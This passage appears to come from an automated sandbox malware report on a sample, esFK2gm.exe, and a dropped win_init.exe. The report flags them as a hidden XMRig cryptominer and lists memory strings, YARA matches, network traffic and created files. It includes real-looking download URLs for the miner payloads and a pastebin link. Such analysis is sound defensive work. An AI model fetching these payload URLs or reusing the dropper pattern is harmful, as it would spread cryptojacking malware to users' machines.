                          Source: svchost.exe, 00000012.00000003.1440062439.0000025DCC240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441083689.0000025DCC262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1431378159.0000025DCC261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                          Source: svchost.exe, 00000012.00000003.1431378159.0000025DCC261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                          Source: svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                          Source: svchost.exe, 00000012.00000002.1441083689.0000025DCC262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1431378159.0000025DCC261000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                          Source: svchost.exe, 00000012.00000003.1440062439.0000025DCC240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                          Source: svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                          Source: svchost.exe, 00000012.00000003.1440062439.0000025DCC240000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
                          Source: svchost.exe, 00000012.00000003.1431338492.0000025DCC264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1440935876.0000025DCC22B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441110879.0000025DCC265000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                          Source: edb.log.13.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                          Source: svchost.exe, 0000000D.00000003.1206128932.000001D639670000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF25201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1303391671.000001BF24472000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.000002238732C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                          Source: powershell.exe, 00000009.00000002.1498144988.0000027200222000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000010.00000002.1487918627.0000022384F30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.000002238732C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/win_init.exe
                          Source: win_init.exe, 00000021.00000002.1803688818.000000C000218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exe
                          Source: esFK2gm.exe, 00000000.00000002.2131272483.000000C0000CA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/letzchipman7/fallen/releases/download/v1.0.0/xmrig-hidden.exeSoftware
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF25201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1498144988.0000027200DCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1671666039.0000013148B43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                          Source: powershell.exe, 00000005.00000002.1364575138.000001BF34401000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1364575138.000001BF342CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1595093978.00000272101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1498144988.00000272019B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1595093978.000002721007C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF25845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1303391671.000001BF245F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387B57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF25845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1303391671.000001BF245F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387B57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/941574414/b85117f6-f40e
                          Source: win_init.exe, 0000001E.00000002.1619147975.000000C000138000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 00000021.00000002.1803688818.000000C00021A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/941574414/ea8c5442-d9b8
                          Source: powershell.exe, 00000005.00000002.1303391671.000001BF25845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1491070014.0000022387B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://objects.githubuserconth
                          Source: esFK2gm.exe, 00000000.00000002.2131272483.000000C0001B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/i3kvksAW
                          Source: svchost.exe, 00000012.00000003.1440197993.0000025DCC231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.sshL#
                          Source: svchost.exe, 00000012.00000003.1440197993.0000025DCC231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1440958719.0000025DCC235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak
                          Source: svchost.exe, 00000012.00000003.1440197993.0000025DCC231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.til(P#
                          Source: svchost.exe, 00000012.00000003.1440197993.0000025DCC231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.viPF#
                          Source: svchost.exe, 00000012.00000003.1440197993.0000025DCC231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtu
                          Source: svchost.exe, 00000012.00000003.1440062439.0000025DCC240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                          Source: svchost.exe, 00000012.00000003.1440032872.0000025DCC24B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                          Source: svchost.exe, 00000012.00000003.1440032872.0000025DCC24B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1441001888.0000025DCC241000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                          Source: svchost.exe, 00000012.00000002.1440935876.0000025DCC22B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                          Source: svchost.exe, 00000012.00000003.1440197993.0000025DCC231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.1440958719.0000025DCC235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/pS#
                          Source: svchost.exe, 00000012.00000003.1440197993.0000025DCC231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.netxK#
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                          Source: svchost.exe, 00000012.00000002.1441044858.0000025DCC257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1440158956.0000025DCC256000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, esFK2gm.exe, 00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 0000001E.00000002.1621539104.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 00000021.00000002.1805169349.000000C000C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/benchmark/%s
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, esFK2gm.exe, 00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 0000001E.00000002.1621539104.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 00000021.00000002.1805169349.000000C000C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, esFK2gm.exe, 00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 0000001E.00000002.1621539104.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 00000021.00000002.1805169349.000000C000C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard
                          Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, esFK2gm.exe, 00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 0000001E.00000002.1621539104.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, win_init.exe, 00000021.00000002.1805169349.000000C000C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/wizard%s
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown | Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown | Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49690 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49692 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: esFK2gm.exe | Binary or memory string: github.com/lxn/win.getRawInputData

System Summary

Source: sslproxydump.pcap, type: PCAP | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0.2.esFK2gm.exe.c000a90000.3.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0.2.esFK2gm.exe.c000a90000.3.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0.2.esFK2gm.exe.c000a90000.3.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: 30.2.win_init.exe.c0009f0000.13.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 30.2.win_init.exe.c0009f0000.13.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 30.2.win_init.exe.c0009f0000.13.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: 33.2.win_init.exe.c000a8a000.14.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 33.2.win_init.exe.c000a8a000.14.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 33.2.win_init.exe.c000a8a000.14.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000021.00000002.1805169349.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000001E.00000002.1621539104.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: esFK2gm.exe PID: 6424, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: win_init.exe PID: 916, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: win_init.exe PID: 6092, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\win_init.exe
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFB9AB20C0C
Source: esFK2gm.exe | Static PE information: Number of sections : 15 > 10
Source: win_init.exe.5.dr | Static PE information: Number of sections : 15 > 10
Source: esFK2gm.exe, 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename xmrig.exe, vs esFK2gm.exe
Source: esFK2gm.exe, 00000000.00000002.2131272483.000000C00014A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename xmrig.exe, vs esFK2gm.exe
Source: sslproxydump.pcap, type: PCAP | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0.2.esFK2gm.exe.c000a90000.3.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0.2.esFK2gm.exe.c000a90000.3.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0.2.esFK2gm.exe.c000a90000.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 30.2.win_init.exe.c0009f0000.13.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 30.2.win_init.exe.c0009f0000.13.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 30.2.win_init.exe.c0009f0000.13.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 33.2.win_init.exe.c000a8a000.14.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 33.2.win_init.exe.c000a8a000.14.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 33.2.win_init.exe.c000a8a000.14.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000000.00000002.2135744163.000000C000400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000000.00000002.2136754074.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000021.00000002.1805169349.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 0000001E.00000002.1621539104.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: esFK2gm.exe PID: 6424, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: win_init.exe PID: 916, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: win_init.exe PID: 6092, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: esFK2gm.exe | Static PE information: Section: /19 ZLIB complexity 0.9994562206725756
Source: esFK2gm.exe | Static PE information: Section: /32 ZLIB complexity 0.9961624528894473
Source: esFK2gm.exe | Static PE information: Section: /65 ZLIB complexity 0.9993740840254031
Source: esFK2gm.exe | Static PE information: Section: /78 ZLIB complexity 0.9914014862804879
Source: win_init.exe.5.dr | Static PE information: Section: /19 ZLIB complexity 0.9994562206725756
Source: win_init.exe.5.dr | Static PE information: Section: /32 ZLIB complexity 0.9961624528894473
Source: win_init.exe.5.dr | Static PE information: Section: /65 ZLIB complexity 0.9993740840254031
Source: win_init.exe.5.dr | Static PE information: Section: /78 ZLIB complexity 0.9914014862804879
Source: classification engine | Classification label: mal100.troj.evad.mine.winEXE@55/24@5/6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\win_init.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6032:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1928:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1552:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4584:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4368:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6608:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5500:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1856:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2296:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5216:120:WilError_03
Source: C:\Users\user\Desktop\esFK2gm.exe | File created: C:\Users\user~1\AppData\Local\Temp\fallenminer.lock
Source: esFK2gm.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7076
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7076
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 7076
